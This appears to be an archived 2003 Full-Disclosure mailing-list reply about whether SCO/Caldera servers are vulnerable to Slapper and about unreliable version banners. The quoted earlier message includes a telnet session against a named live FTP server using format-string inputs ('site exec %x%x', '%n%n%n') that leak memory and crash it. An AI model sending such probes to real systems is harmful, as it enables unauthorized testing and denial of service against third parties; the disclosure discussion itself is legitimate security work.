lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <000e01c36697$563e3c80$2b02a8c0@dcopley>
From: dcopley at eeye.com (Drew Copley)
Subject: SCO Web Site Vulnerable to Slapper?


> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com 
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of KF
> Sent: Tuesday, August 19, 2003 9:21 AM
> To: Jeremiah Cornelius
> Cc: Gherkin McDonalds; full-disclosure@...ts.netsys.com; 
> security@...dera.com; security@....com
> Subject: Re: [Full-Disclosure] SCO Web Site Vulnerable to Slapper?
> 
> 
> **** CALERA ARE YOU PAYING ATTENTION **** WAKE UP ****
> 
> (normally I would not do this...) I am under the impression 
> that either 
> they probably don't care about their secuirty or they are 
> ignorant... I 
> reported this (see below) to them SEVERAL times... they use a 
> vulnerable 
> version of their own ftpd on their ftp server... can you say trojaned 
> distribution site? They probably have not patched it because 
> no one has 
> produced a public exploit... they DO have a patch available however.
> 
> > telnet ftpput.caldera.com 21
> > Trying 216.250.128.33...
> > Connected to ftpput.caldera.com.
> > Escape character is '^]'.
> > 220 artemis FTP server (Version 2.1WU(1)) ready.
> > user anonymous
> > 331 Guest login ok, send e-mail address as password.
> > pass err@
> > 230-Welcome to Caldera's FTP Archive Site
> > 230-
> ...
> > 230 Guest login ok, access restrictions apply.
> > site exec %x%x
> > 200-d2
> > 200  (end of '%x%x')
> > site exec %n%n%n
> > Connection closed by foreign host.
> 
> 
> -KF
> 
> 
> -------------------------------------------------
> subject: [Full-Disclosure] SCO Web Site Vulnerable to 
> Slapper? integerdotonefourfivenine@...oo.com wrote:
> 
> They seem to be running Apache/1.3.14 (Unix)
> mod_ssl/2.7.1 OpenSSL/0.9.6 PHP/4.3.2-RC on Linux,
> which, if I have my facts straight, is vulnerable to 
> <URL:http://www.cert.org/advisories/CA-2002-27.html>.
> 
> Am I correct?

Unfortunately, the version number reported is not always accurate. Very
often [or too often] admins will recompile customized fixes of their
software and not bother with upgrading the version number.

Some have even recommended this kind of tactic as a security measure, to
throw people off. However, it makes remote checking - automated checking
- of systems by administrators more difficult, and depending on the
issue, potentially impossible. With plain text protocols it can be
extremely difficult to ascertain whether or not they have a fix for a
security issue unless they have upgraded their version number or one is
willing to crash one's server with a live test.

With binary protocols and major upgrades there tends to be more of a
chance that one can do a non-intrusive check that does not require a
crash and does not require version numbers.

This said, it would be illegal to actually test their site, so let them
handle the hassle. It is unprofessional and rude of them not to respond
about this concern, but that and telling people is all you can do.


> 
> 
> 
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ